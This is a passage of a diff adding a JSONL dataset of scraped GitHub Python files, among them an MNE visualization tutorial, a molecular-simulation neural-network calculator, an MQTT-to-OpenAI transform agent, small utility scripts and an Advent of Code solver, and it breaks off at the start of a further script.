diff --git "a/3633.jsonl" "b/3633.jsonl" new file mode 100644--- /dev/null +++ "b/3633.jsonl" @@ -0,0 +1,2099 @@ +{"seq_id":"73034986613","text":"\"\"\"\n.. _tut_viz_raw:\n\nVisualize Raw data\n==================\n\n\"\"\"\nimport os.path as op\nimport numpy as np\n\nimport mne\n\ndata_path = op.join(mne.datasets.sample.data_path(), 'MEG', 'sample')\nraw = mne.io.read_raw_fif(op.join(data_path, 'sample_audvis_raw.fif'))\nraw.set_eeg_reference() # set EEG average reference\nevents = mne.read_events(op.join(data_path, 'sample_audvis_raw-eve.fif'))\n\n###############################################################################\n# The visualization module (:mod:`mne.viz`) contains all the plotting functions\n# that work in combination with MNE data structures. Usually the easiest way to\n# use them is to call a method of the data container. All of the plotting\n# method names start with ``plot``. If you're using Ipython console, you can\n# just write ``raw.plot`` and ask the interpreter for suggestions with a\n# ``tab`` key.\n#\n# To visually inspect your raw data, you can use the python equivalent of\n# ``mne_browse_raw``.\nraw.plot(block=True)\n\n###############################################################################\n# The channels are color coded by channel type. Generally MEG channels are\n# colored in different shades of blue, whereas EEG channels are black. The\n# scrollbar on right side of the browser window also tells us that two of the\n# channels are marked as ``bad``. Bad channels are color coded gray. By\n# clicking the lines or channel names on the left, you can mark or unmark a bad\n# channel interactively. You can use +/- keys to adjust the scale (also = works\n# for magnifying the data). Note that the initial scaling factors can be set\n# with parameter ``scalings``. If you don't know the scaling factor for\n# channels, you can automatically set them by passing scalings='auto'. With\n# ``pageup/pagedown`` and ``home/end`` keys you can adjust the amount of data\n# viewed at once.\n#\n# You can enter annotation mode by pressing ``a`` key. In annotation mode you\n# can mark segments of data (and modify existing annotations) with the left\n# mouse button. You can use the description of any existing annotation or\n# create a new description by typing when the annotation dialog is active.\n# Notice that the description starting with the keyword ``'bad'`` means that\n# the segment will be discarded when epoching the data. Existing annotations\n# can be deleted with the right mouse button. Annotation mode is exited by\n# pressing ``a`` again or closing the annotation window. See also\n# :class:`mne.Annotations` and :ref:`marking_bad_segments`. To see all the\n# interactive features, hit ``?`` key or click ``help`` in the lower left\n# corner of the browser window.\n#\n# The channels are sorted by channel type by default. You can use the ``order``\n# parameter of :func:`raw.plot ` to group the channels in a\n# different way. ``order='selection'`` uses the same channel groups as MNE-C's\n# mne_browse_raw (see :ref:`CACCJEJD`). The selections are defined in\n# ``mne-python/mne/data/mne_analyze.sel`` and by modifying the channels there,\n# you can define your own selection groups. Notice that this also affects the\n# selections returned by :func:`mne.read_selection`. By default the selections\n# only work for Neuromag data, but ``order='position'`` tries to mimic this\n# behavior for any data with sensor positions available. The channels are\n# grouped by sensor positions to 8 evenly sized regions. Notice that for this\n# to work effectively, all the data channels in the channel array must be\n# present. The ``order`` parameter can also be passed as an array of ints\n# (picks) to plot the channels in the given order.\nraw.plot(order='selection')\n\n###############################################################################\n# We read the events from a file and passed it as a parameter when calling the\n# method. The events are plotted as vertical lines so you can see how they\n# align with the raw data.\n#\n# We can check where the channels reside with ``plot_sensors``. Notice that\n# this method (along with many other MNE plotting functions) is callable using\n# any MNE data container where the channel information is available.\nraw.plot_sensors(kind='3d', ch_type='mag', ch_groups='position')\n\n###############################################################################\n# We used ``ch_groups='position'`` to color code the different regions. It uses\n# the same algorithm for dividing the regions as ``order='position'`` of\n# :func:`raw.plot `. You can also pass a list of picks to\n# color any channel group with different colors.\n#\n# Now let's add some ssp projectors to the raw data. Here we read them from a\n# file and plot them.\nprojs = mne.read_proj(op.join(data_path, 'sample_audvis_eog-proj.fif'))\nraw.add_proj(projs)\nraw.plot_projs_topomap()\n\n###############################################################################\n# The first three projectors that we see are the SSP vectors from empty room\n# measurements to compensate for the noise. The fourth one is the average EEG\n# reference. These are already applied to the data and can no longer be\n# removed. The next six are the EOG projections that we added. Every data\n# channel type has two projection vectors each. Let's try the raw browser\n# again.\nraw.plot()\n\n###############################################################################\n# Now click the `proj` button at the lower right corner of the browser\n# window. A selection dialog should appear, where you can toggle the projectors\n# on and off. Notice that the first four are already applied to the data and\n# toggling them does not change the data. However the newly added projectors\n# modify the data to get rid of the EOG artifacts. Note that toggling the\n# projectors here doesn't actually modify the data. This is purely for visually\n# inspecting the effect. See :func:`mne.io.Raw.del_proj` to actually remove the\n# projectors.\n#\n# Raw container also lets us easily plot the power spectra over the raw data.\n# Here we plot the data using `spatial_colors` to map the line colors to\n# channel locations (default in versions >= 0.15.0). Other option is to use the\n# `average` (default in < 0.15.0). See the API documentation for more info.\nraw.plot_psd(tmax=np.inf, average=False)\n\n###############################################################################\n# Plotting channel-wise power spectra is just as easy. The layout is inferred\n# from the data by default when plotting topo plots. This works for most data,\n# but it is also possible to define the layouts by hand. Here we select a\n# layout with only magnetometer channels and plot it. Then we plot the channel\n# wise spectra of first 30 seconds of the data.\nlayout = mne.channels.read_layout('Vectorview-mag')\nlayout.plot()\nraw.plot_psd_topo(tmax=30., fmin=5., fmax=60., n_fft=1024, layout=layout)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/mne-tools_mne-python/mne-python-master/tutorials/plot_visualize_raw.py","file_name":"plot_visualize_raw.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"1784982090","text":"import torch\nfrom schnetpack.interfaces.ase_interface import AtomsConverter\nfrom schnetpack.transform.neighborlist import TorchNeighborList, APNetNeighborList, APNetPBCNeighborList\nfrom schnetpack.transform import CastTo32, FDSetup, FDSetup_SchNet\nimport numpy as np\nfrom ase import Atoms\nimport time\nfrom ase.calculators.calculator import Calculator, all_changes\nfrom ase.geometry import get_distances\nimport pickle\n\ndef shift_reacting_atom(positions, react_residue, box):\n \"\"\"\n Some OpenMM forces need a residue to not be split by \n periodic boundaries, and the \"wrap\" function in the \n calculator function only wraps residues according to\n the H11 topology, which may result in spliting the \n reacting residue across a periodic boundary. This\n function ensures that the reacting atom is wrapped\n back to the principal box with the other atoms in\n the reacting residue\n\n Parameters\n -----------\n positions : np.ndarray\n Positions array\n react_residue : list\n Indices of the reacting_residue\n box : object\n ASE cell object\n\n Returns\n ----------\n positions : np.ndarray\n Positions with the shifted atom position\n \"\"\"\n react_positions = positions[react_residue]\n #Get distances (w/o minimum image) using the ASE get_distances function \n #from atom 0 in the residue to the rest of the atoms in the residue\n D, D_len = get_distances(react_positions[0], react_positions[1:])\n\n D_mic, D_len_mic = get_distances(react_positions[0], react_positions[1:], cell=box, pbc=True)\n #Determine if there is a difference between the minimum image distances and the non-minimum imaged\n #distances\n diff = D - D_mic\n\n positions[react_residue[1:]] -= diff[0]\n return positions\n\ndef reorder(array, traj_inds):\n \"\"\"\n Sometimes we want to reorder forces or position from the diabat 2 ordering to the diabat 1 ordering\n Parameters\n -----------\n forces : np.ndarray\n np array containing either forces or positions\n traj_inds : list\n list of ints containing the location of each atom from diabat 1 in diabat 2\n\n Returns\n -----------\n array[reord_list] : np.ndarray\n reorderd array\n \"\"\"\n reord_list = [traj_inds.index(i) for i in range(len(traj_inds))]\n return array[reord_list]\n\nclass NN_Intra(Calculator):\n \"\"\"\n Class for obtaining the energies and forces from SchNetPack\n neural networks, designed for single molecules intramolecular interactions\n \"\"\"\n energy = \"energy\"\n forces = \"forces\"\n implemented_properties = [energy, forces]\n\n def __init__(self, model, force_atoms, damping=None, device='cuda', **kwargs):\n \"\"\"\n Parameters\n -----------\n model : str\n location of the neural network model for the monomer\n force_atoms : list\n List of atom indices that correspond to the atoms the neural network is applied to\n damping : list\n Indices of atoms that the damping function will be applied to\n device : str\n String indicating where the neural networks will be run. Default is cuda.\n \"\"\"\n Calculator.__init__(self, **kwargs)\n\n self.model = torch.load(model).to(torch.device(device))\n self.nn_force_atoms = force_atoms\n transforms = []\n if damping:\n fd_setup = FDSetup_SchNet(damping[0], damping[1])\n transforms.append(fd_setup)\n transforms.append(CastTo32())\n neighbor_list = TorchNeighborList(8.0)\n self.converter = AtomsConverter(neighbor_list=neighbor_list, transforms=transforms, device=\"cuda\")\n\n def calculate(self, atoms=None, properties=['energy'], system_changes=all_changes):\n \"\"\"\n Compute the energy for the intramolecular energies\n\n Parameters\n -----------\n atoms : ASE Atoms Object\n ASE Atoms Object used as the input for the neural networks.\n properties : list\n Properties that the ASE class is trying to get\n system_changes : list\n List of changes detected by the ASE class\n \"\"\"\n self.results = {}\n Calculator.calculate(self, atoms)\n\n atoms = atoms[self.nn_force_atoms]\n inputs = self.converter(atoms)\n result = self.model(inputs)\n energy = result[\"y\"].detach().cpu().numpy()\n forces = result[\"dr_y\"].detach().cpu().numpy()\n forces[forces!=forces] = 0\n self.results[\"energy\"] = energy\n self.results[\"forces\"] = forces\n\nclass NN_Inter:\n \"\"\"\n Class for obtaining the energies and forces from SchNetPack\n neural networks, designed for intermolecular dimer interactions.\n \"\"\"\n def __init__(self, model, res_list, ZA, ZB, damping=None, pbc=True, device='cuda'):\n \"\"\"\n Parameters\n -----------\n model : str\n location of the neural network model for the dimer\n res_list : list\n List of atom indices that correspond to the atoms the neural network is applied to\n ZA : np.ndarray\n Atomic numbers of residue 1\n ZB : np.ndarray\n Atomic numbers of residue 2\n damping : list\n List of atoms that the damping function is applied to\n pbc : bool\n Whether minimum image functions need to be used\n device : str\n String indicating where the neural networks will be run. Default is cuda.\n \"\"\"\n self.model = torch.load(model).to(torch.device(device))\n self.res_list = res_list\n self.nn_force_atoms = np.asarray([atom_id for res in res_list for atom_id in res])\n self.nn_force_atoms = self.nn_force_atoms.astype(int)\n nn_res_list = [[i for i in range(len(res_list[0]))]]\n monomer_2 = [i for i in range(res_list[0][-1]+1, res_list[0][-1]+1+len(res_list[1]))]\n nn_res_list.append(monomer_2)\n self.device = device\n transforms = []\n \n if damping:\n fd_setup = FDSetup(damping[0], damping[1])\n transforms.append(fd_setup)\n\n transforms.append(CastTo32())\n if pbc:\n neighbor_list = APNetPBCNeighborList(ZA, ZB)\n else:\n neighbor_list = APNetNeighborList(ZA, ZB)\n\n self.converter = AtomsConverter(neighbor_list=neighbor_list, transforms=transforms, device=self.device)\n\n def compute_energy_force(self, atoms, total_forces, atom_potential=None):\n \"\"\"\n Compute the energy for the intramolecular components of the dimer\n\n Parameters\n -----------\n atoms : ASE Atoms Object\n ASE Atoms Object used as the input for the neural networks.\n total_forces : np.ndarray\n numpy array containing the total intramolecular forces for a diabat\n atom_potential : optional, np.ndarray\n Contains the external electric potential on each atom if the model uses this\n\n Returns\n -----------\n energy : np.ndarray\n Intramoleculer energy in kJ/mol\n forces : np.ndarray\n Intramolecular forces in kJ/mol/A\n \"\"\"\n inputs = self.converter(atoms[self.nn_force_atoms])\n if atom_potential is not None:\n inputs[\"potential_solvent_A\"] = torch.from_numpy(atom_potential[self.res_list[0]]).to(self.device).float()\n inputs[\"potential_solvent_B\"] = torch.from_numpy(atom_potential[self.res_list[1]]).to(self.device).float()\n result = self.model(inputs)\n energy = result[\"y\"].detach().cpu().numpy()\n forces = result[\"dr_y\"].detach().cpu().numpy()\n forces[forces!=forces] = 0\n total_forces[self.nn_force_atoms] += forces\n\n return np.asarray(energy), total_forces\n\nclass Diabat:\n \"\"\"\n Contains collection of terms that are used to model each diabat\n \"\"\"\n def __init__(self, openmm, nn_intra_opts, nn_inter_opts, reorder_graph=None, shift=0):\n \"\"\"\n Parameters\n -----------\n openmm_opts : dictionary\n collection of options needed to start OpenMM\n nn_intra_opts : dictionary\n collection of options need to initialize NN_Intra classes\n nn_inter_opts : dictionary\n collection of options needed to initialize NN_Inter classes\n reorder_graph : GraphReorder object\n (optional) object that reorders the diabat 1 positions to another diabat. Not needed for diabat 1\n shift : float\n (optional) shift diabat 2 to be on the same energy level as diabat 1. The electronic energy\n of the isolated monomers \n \"\"\"\n self.openmm = openmm\n if nn_intra_opts:\n self._setup_nnintra(nn_intra_opts)\n if nn_inter_opts:\n self._setup_nninter(nn_inter_opts)\n self.reorder_graph = reorder_graph\n self.shift = shift\n\n def _setup_nnintra(self, nnintra_opts):\n \"\"\"\n Parameters\n -----------\n nnintra_opts : dictionary\n list of options needed to create the NN_Intra class\n \"\"\"\n self.nnintra = []\n for opt in nnintra_opts:\n model = opt['fname']\n indices = opt[\"atom_index\"]\n if \"damping_parent\" in opt.keys():\n parent_atom = opt[\"damping_parent\"]\n dissoc_atom = opt[\"damping_dissoc\"]\n parent_atom = parent_atom.split(',')\n parent_atom = [int(i) for i in parent_atom]\n if not isinstance(dissoc_atom, list): dissoc_atom = list(dissoc_atom)\n dissoc_atom = [int(i) for i in dissoc_atom]\n nnintra = NN_Intra(model, indices, damping=[parent_atom, dissoc_atom])\n else:\n nnintra = NN_Intra(model, indices)\n self.nnintra.append(nnintra)\n\n def _setup_nninter(self, nninter_opts):\n \"\"\"\n Parameters\n -----------\n nnintra_opts : dictionary\n list of options needed to create the NN_Intra class\n \"\"\"\n\n model = nninter_opts['fname']\n residue_indices = nninter_opts[\"indices\"]\n parent_atom = nninter_opts[\"damping_parent\"]\n dissoc_atom = nninter_opts[\"damping_dissoc\"]\n ZA = np.asarray(nninter_opts[\"ZA\"])\n ZB = np.asarray(nninter_opts[\"ZB\"])\n parent_atom = parent_atom.split(',')\n parent_atom = [int(i) for i in parent_atom]\n dissoc_atom = dissoc_atom.split(',')\n dissoc_atom = [int(i) for i in dissoc_atom]\n\n self.nninter = NN_Inter(model, residue_indices, ZA, ZB, damping=[parent_atom, dissoc_atom])\n\n def compute_energy_force(self, atoms, potential=None, field=None, atom_potential=None):\n \"\"\"\n Parameters\n -----------\n atoms : ASE atoms object\n atoms object\n potential : float, optional\n add potential energy from external potential if present (usually only for a training step\n field : np.ndarray, optional\n add forces from the external field if present\n atom_potential : np.ndarray, optional\n external potential on each atom\n\n Returns\n -----------\n energy : np.ndarray\n Contains the energy for a particular configuration\n forces : np.ndarray\n Contains the forces (ordered in diabat 1) for a particular configuration\n \"\"\"\n #Determine if the Diabat object contains a GraphReorder class\n if self.reorder_graph:\n new_atoms, indices = self.reorder_graph.reorder(atoms)\n else:\n new_atoms = atoms\n indices = np.arange(len(new_atoms)).astype(int).tolist()\n\n if self.openmm.cutoff:\n res_list = self.openmm.res_list()\n react_residue = res_list[self.openmm.react_residue]\n positions = shift_reacting_atom(new_atoms.get_positions(), react_residue, new_atoms.get_cell())\n new_atoms.set_positions(positions)\n \n #Initialize a zeros array in order to contain all the forces\n total_forces = np.zeros_like(new_atoms.get_positions())\n \n openmm_energy, openmm_forces = self.compute_openmm_energy(new_atoms)\n \n #Loop through the NN_Intra classes and get the energies and forces\n nnintra_energy, total_forces = self.compute_nn_intra(new_atoms, total_forces)\n #Get the NN_Inter energy/force\n nninter_energy, total_forces = self.nninter.compute_energy_force(new_atoms, total_forces, atom_potential)\n \n #Combine the SAPT-FF energy/force with the neural network energy/force\n energy = openmm_energy + nnintra_energy + nninter_energy + self.shift\n forces = openmm_forces + total_forces\n \n if potential:\n energy += potential\n forces += field\n \n #Reorder with the current indices\n forces = reorder(forces, indices)\n return energy, forces\n\n def compute_openmm_energy(self, atoms):\n \"\"\"\n Get energy from OpenMM\n\n Parameters\n -----------\n atoms : ASE atoms object\n atoms\n\n Returns \n -----------\n oprnmm_energy : np.ndarray\n OpenMM Energy in kJ/mol\n openmm_forces : np.ndarray\n OpenMM Forces in kJ/mol/A\n \"\"\"\n #Set initial positions\n self.openmm.set_initial_positions(atoms.get_positions())\n self.openmm.calculate(atoms=atoms)\n openmm_energy = self.openmm.results[\"energy\"]\n openmm_forces = self.openmm.results[\"forces\"]\n\n return openmm_energy, openmm_forces\n\n def compute_nn_intra(self, atoms, total_forces):\n \"\"\"\n Loop through all NN Intra models and get energy and force\n\n Parameters\n -----------\n atoms : ASE atoms object\n atoms\n total_forces : np.ndarray\n Array for which to add all forces from the NN models\n\n Returns \n -----------\n nnintra_energy : np.ndarray\n NN_Intra Energy in kJ/mol\n total_forces : np.ndarray\n Contains the forces from all the NN models\n \"\"\"\n\n nnintra_energy = 0\n for nnintra in self.nnintra:\n nnintra.calculate(atoms=atoms)\n energy = nnintra.results[\"energy\"]\n forces = nnintra.results[\"forces\"]\n nnintra_energy += energy\n total_forces[nnintra.nn_force_atoms] += forces\n return nnintra_energy, total_forces\n\n","repo_name":"jstoppelman/PBNN","sub_path":"nn/diabat.py","file_name":"diabat.py","file_ext":"py","file_size_in_byte":14468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73187808691","text":"from . import env\n\nimport openai\nimport json\nimport paho.mqtt.client as mqtt\nimport time\nimport uuid\n\nopenai.api_key = env.OPENAI_API_KEY\n\ndef millis() -> int:\n return int(time.time() * 1000)\n\nenv_config = {\n 'chat-gpt-model': env.GPT_MODEL,\n 'system-prompt': env.GPT_SYSTEM_PROMPT,\n 'user-prompt': env.GPT_USER_PROMPT if env.GPT_USER_PROMPT else None,\n 'output-json': env.OUTPUT_JSON\n}\n\nconfig = {\n 'chat-gpt-model': env.GPT_MODEL,\n 'system-prompt': env.GPT_SYSTEM_PROMPT,\n 'user-prompt': env.GPT_USER_PROMPT if env.GPT_USER_PROMPT else None,\n 'output-json': env.OUTPUT_JSON\n}\n\n\nDEBUG = env.DEBUG\n\nroot_topic = f'gpt-transform-v1/{env.AGENT_NAME}/'\n\nconfig_topic = root_topic + 'config'\nlog_topic = root_topic + 'metrics/logs/debug'\nstatus_topic = root_topic + 'metrics/status'\n\n\ndef publish_config(client: mqtt.Client, initial: bool = False):\n client.publish(config_topic, json.dumps({'timestamp': millis(), 'config': config, 'initial-publish': initial}), retain=True)\n\n\ndef on_config_change(client, userdata, message):\n try:\n new_config = json.loads(message.payload.decode())\n except Exception as err:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'error', 'error': str(err), 'function': 'on_config_change(client, userdata, message)'}))\n return\n\n if new_config.get('initial-publish'):\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'log', 'message': 'Ignoring initial publish of config', 'function': 'on_config_change(client, userdata, message)'}))\n return\n \n new_config = new_config.get('config')\n if not new_config:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'error', 'error': 'New Config Published without \"config\" key', 'function': 'on_config_change(client, userdata, message)'}))\n return\n \n #env_config = True\n config_changed = False\n try:\n for key, value in new_config.items():\n # if key not in env_config.keys() or value != env_config[key]:\n # env_config = False\n if key not in config.keys() or value == config[key]:\n # Ignore Keys that don't belong\n continue\n config[key] = value\n config_changed = True\n \n\n except Exception as err:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'error', 'config': config, 'error': str(err), 'function': 'on_config_change(client, userdata, message)'}))\n return\n\n if not config_changed:\n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'log', 'message': 'new unchanged config received', 'function': 'on_config_change(client, userdata, message)'}))\n return\n \n if DEBUG:\n client.publish(log_topic, json.dumps({'eventType': 'log', 'message': 'Config changed successfully', 'function': 'on_config_change(client, userdata, message)'}))\n\n\ndef on_incoming_data(client, userdata, message):\n '''\n Transform Data and publish transformed data to publish topic\n '''\n start = millis()\n message_uuid = str(uuid.uuid4())\n \n prompt = [\n {'role': 'system', 'content': config['system-prompt']},\n {'role': 'user', 'content': f'{config[\"user-prompt\"]}\\n\\n{message.payload.decode()}' if config['user-prompt'] else f'{message.payload.decode()}'}\n ]\n\n chat_params = dict(\n model=config['chat-gpt-model'],\n messages=prompt\n )\n\n if config['output-json']:\n chat_params['response_format'] = {'type': 'json_object'}\n\n chat_response = openai.ChatCompletion.create(**chat_params)\n\n response_content = chat_response['choices'][0]['message']['content']\n\n end = millis()\n response = {\n 'uuid': message_uuid,\n 'received-ts': start,\n 'processed-ts': end,\n 'response-content': response_content,\n 'process-time': end - start,\n **chat_response['usage']\n }\n client.publish(env.MQTT_PUBLISH_TOPIC, response_content)\n client.publish(root_topic+'metrics/message-processed', json.dumps(response))\n\n\ndef on_connect(client, userdata, flags, rc):\n client.publish(status_topic, json.dumps({'state': 'ONLINE', 'ts': millis()}), retain=True)\n if DEBUG:\n client.publish(log_topic, f'Client Connected: {env.AGENT_NAME}')\n\n client.message_callback_add(env.MQTT_SUBSCRIBE_TOPIC, on_incoming_data)\n client.message_callback_add(config_topic, on_config_change)\n\n client.subscribe(config_topic)\n client.subscribe(env.MQTT_SUBSCRIBE_TOPIC)\n\n publish_config(client, initial=True)\n \n\n\ndef create_mqtt_client() -> mqtt.Client:\n client = mqtt.Client(client_id=env.MQTT_CLIENT_ID, protocol=mqtt.MQTTv311)\n\n if env.MQTT_USE_TLS:\n client.tls_set(cert_reqs=mqtt.ssl.CERT_REQUIRED)\n\n client.username_pw_set(username=env.MQTT_USERNAME, password=env.MQTT_PASSWORD)\n\n client.will_set(topic=status_topic, payload=json.dumps({'state': 'OFFLINE', 'will-set-ts': millis()}), retain=True)\n\n client.on_connect = on_connect\n\n return client\n\n\n\ndef start_app():\n mqtt_client = create_mqtt_client()\n mqtt_client.connect(host=env.MQTT_HOST, port=env.MQTT_PORT)\n mqtt_client.loop_forever()","repo_name":"mkeras/chatGPTAgent","sub_path":"source/sparkplug_init.py","file_name":"sparkplug_init.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6066830024","text":"from pathlib import Path\r\nimport pandas as pd\r\n\r\n\r\ndef get_bbox_for_image(image_id,\r\n bbox_file_path=Path('data/raw/train.csv')):\r\n \"\"\"Get the bounding boxes for the respective image from the file.\r\n\r\n Parameter\r\n ---------\r\n images_id : str\r\n Id of the image in question\r\n\r\n bbox_file_path : pathlib.Path\r\n Path to file containing bboxes\r\n\r\n Return\r\n ------\r\n bbox_list : list(list(float))\r\n List of all bboxes. Format: [x_pos, y_pos, width, height]\r\n \"\"\"\r\n\r\n df = pd.read_csv(bbox_file_path)\r\n\r\n df_image = df[df[\"image_id\"] == image_id]\r\n\r\n image_bbox = df_image['bbox']\r\n\r\n bbox_list = list()\r\n\r\n for i, bbox_string in image_bbox.iteritems():\r\n bbox_string = bbox_string.replace('[', '')\r\n bbox_string = bbox_string.replace(']', '')\r\n\r\n bbox_split = bbox_string.split(',')\r\n bbox = [float(value) for value in bbox_split]\r\n bbox_list.append(bbox)\r\n\r\n return bbox_list\r\n\r\n\r\nif __name__ == '__main__':\r\n get_bbox_for_image('b6ab77fd7')\r\n","repo_name":"CoffeeMugTwo/rcnn","sub_path":"src/data/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42921492442","text":"def merge(a: list, b: list) -> list:\n \"\"\"Merges B into A in sorted order\n\n a is modified in place and also returned\n\n Args:\n a: sorted list with enough buffer at the end to hold b\n b: sorted list\n\n Returns:\n A single sorted list\n \"\"\"\n end_b = len(b) - 1\n for idx, val in enumerate(a):\n if val is None:\n break\n end_a = idx - 1\n\n last = end_b + end_a + 1\n\n while end_b >= 0 and end_a >= 0:\n if a[end_a] > b[end_b]:\n a[last] = a[end_a]\n a[end_a] = None\n end_a -= 1\n else:\n a[last] = b[end_b]\n b[end_b] = None\n end_b -= 1\n last -= 1\n return a\n","repo_name":"danong/ctci-6th-solutions","sub_path":"pythonsolutions/sorting_and_searching/sorted_merge.py","file_name":"sorted_merge.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7115986426","text":"import os.path\r\nimport datetime\r\nimport shutil\r\n\r\nprint(\"Qual a pasta deseja arquivar?\")\r\np = input()\r\nif os.path.isdir(p) :\r\n dt = datetime.date.today()\r\n str = p+\"_\"+dt.isoformat();\r\n shutil.move(p,str+\"\\\\\"+p)\r\n shutil.make_archive(str,\"zip\",str)\r\n shutil.move(str+\"\\\\\"+p,p)\r\n shutil.rmtree(str);\r\nelse :\r\n print(\"Pasta \\\"\"+p+\"\\\" não localizada!\")","repo_name":"DaniloEpic/util","sub_path":"arquivar.py","file_name":"arquivar.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41188328226","text":"import sys\nimport csv\nfrom tabulate import tabulate\n\ndef main():\n file = check_arguments()\n table = file_opener(file)\n print(tabulate(table, headers=\"keys\", tablefmt=\"grid\"))\n\ndef check_arguments():\n if len(sys.argv) <= 1:\n sys.exit(\"Too few command-line arguments\")\n elif len(sys.argv) > 2:\n sys.exit(\"Too many command-line arguments\")\n else:\n csv_check = sys.argv[1].split(\".\")[-1]\n if csv_check != \"csv\":\n sys.exit(\"Not a CSV file\")\n else:\n return sys.argv[1]\n\ndef file_opener(file):\n lst = []\n try:\n with open(file) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n lst.append(row)\n return lst\n except FileNotFoundError:\n sys.exit(\"File does not exist\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"smkatash/CS50_python_2022","sub_path":"week06/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13789126000","text":"'''\nDay 16\nhttps://adventofcode.com/2020/day/16\n'''\nimport util\nimport csv\nimport pandas as pd\n\n\ndef task1(tickets, valid_range):\n '''\n Solver for task 1. Identifies the error rate and valid tickets\n\n Inputs:\n tickets (lst of lst of ints): All the valid tickets as determined by \n task 1\n valid_range (lst of tuples): list of all bounds of all the ranges\n field_names (lst of strs): corresponding names to ranges\n \n Returns: \n error_rate (int): The sum of all the integers that don't fit into any \n field\n valid_tickets (lst of lst of ints): a list of tickets where every \n column fits into some range\n '''\n error_rate = 0\n valid_tickets=[]\n for ticket in tickets:\n add_ticket = True\n for number in ticket:\n if not is_valid(number, valid_range):\n error_rate += number\n add_ticket = False\n if add_ticket:\n valid_tickets.append(ticket)\n return error_rate, valid_tickets\n\n\ndef task2(tickets, valid_range, field_names):\n '''\n Solver for task 2\n\n Inputs:\n tickets (lst of lst of ints): All the valid tickets as determined by \n task 1\n valid_range (lst of tuples): list of all bounds of all the ranges\n field_names (lst of strs): corresponding names to ranges\n \n Returns: an integer containing the product of the six values on your ticket \n that correspond to fields with the word departure\n '''\n valid_dict = {}\n for i,_ in enumerate(tickets[0]):\n valid_dict[i+1] = [name for name in field_names]\n num_fields = len(valid_range)\n for ticket in tickets:\n for pos, number in enumerate(ticket):\n for i in range(0, num_fields, 2):\n if not is_valid(number, valid_range[i: i+2]):\n valid_dict[pos+1].remove(field_names[i//2])\n dict_lst = simplify_dict(valid_dict)\n to_multiply = []\n my_ticket = valid_tickets[-1]\n result = 1\n for key, value in dict_lst:\n if value[0].split()[0] == \"departure\":\n result *= my_ticket[key-1]\n return result\n\n\ndef simplify_dict(d):\n '''\n Recursive helper function that takes a dictionary and determines how to \n each key to a unique value. Note this only works if one key has only one \n value and, once you remove that value, another key only has one value \n and so on.\n\n Inputs: d (dict): The dictionary mapping columns to potential field names\n\n Returns: list of tuples containing the column number and the field name it \n maps to\n '''\n if len(d) == 1:\n return list(d.items())\n else:\n single_key = None\n single_value = None\n for key, value in d.items():\n if len(value) == 1:\n single_key = key\n single_value = value\n break\n d.pop(single_key)\n for key, value in d.items():\n if single_value[0] in value:\n value.remove(single_value[0])\n remaining_lst = simplify_dict(d)\n return remaining_lst + [(single_key, single_value)]\n \n\ndef is_valid(num, valid_range):\n '''\n Checks whether number is in any valid range\n\n inputs: num - an integer\n valid_range: a list of length 2 lists containing the valid ranges\n\n outputs: boolen\n '''\n for lb, ub in valid_range:\n if num >= lb and num <= ub:\n return True\n return False\n\n\ndef create_ranges(file):\n '''\n Creates a list of ranges for the fields.\n\n Inputs: \n file (file): The file containing the ranges and field names\n\n Returns: rv (list of tuples): list containing tuples of (lb, ub)\n '''\n rv = []\n field = util.read_strs(file, sep = '\\n')\n for line in field:\n words = line.split()\n int_1 = words[-3]\n int_2 = words[-1]\n intv_1, intv_2 = text_to_range(int_1), text_to_range(int_2)\n rv.append(intv_1)\n rv.append(intv_2)\n return rv\n\n\ndef text_to_range(intg):\n '''\n Splits str ranges into list with integers for lower and upper bounds\n\n Inputs:\n intg (str): Not my best variable name, the string 'lb-ub'\n \n Returns: list of ints contaning lower bound and upper bound\n '''\n splt_intv = intg.split(\"-\")\n return [int(splt_intv[0]), int(splt_intv[1])]\n\n\nif __name__ == \"__main__\":\n # Read in data\n ranges = create_ranges(\"inputs/day16_inputranges.txt\")\n test_ranges = [[1, 3], [5, 7], [6, 11], [33, 44], [13, 40],[45, 50]]\n test_tickets = [[7,3,47], [40,4,50], [55,2,20], [38,6,12]]\n df = pd.read_csv(\"inputs/day16_input.csv\")\n nearby_tickets = df.values.tolist()\n util.call_and_print(task1, test_tickets, test_ranges) \n util.call_and_print(task1, nearby_tickets, ranges) \n names = ['departure location', 'departure station', 'departure platform',\n 'departure track', 'departure date', 'departure time', \n 'arrival location', 'arrival station', 'arrival platform', \n 'arrival track', 'class', 'duration', 'price', 'route', 'row', 'seat', \n 'train', 'type', 'wagon', 'zone']\n\n answer, valid_tickets = task1(nearby_tickets, ranges)\n\n valid_tickets.append([89,139,79,151,97,67,71,53,59,149,127,131,103,\n 109,137,73,101,83,61,107])\n util.call_and_print(task2, valid_tickets, ranges, names)\n\n","repo_name":"eschondorf/advent_of_code","sub_path":"2020/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74617654453","text":"#!/usr/local/CyberCP/bin/python\nimport sys\nimport os.path\nimport 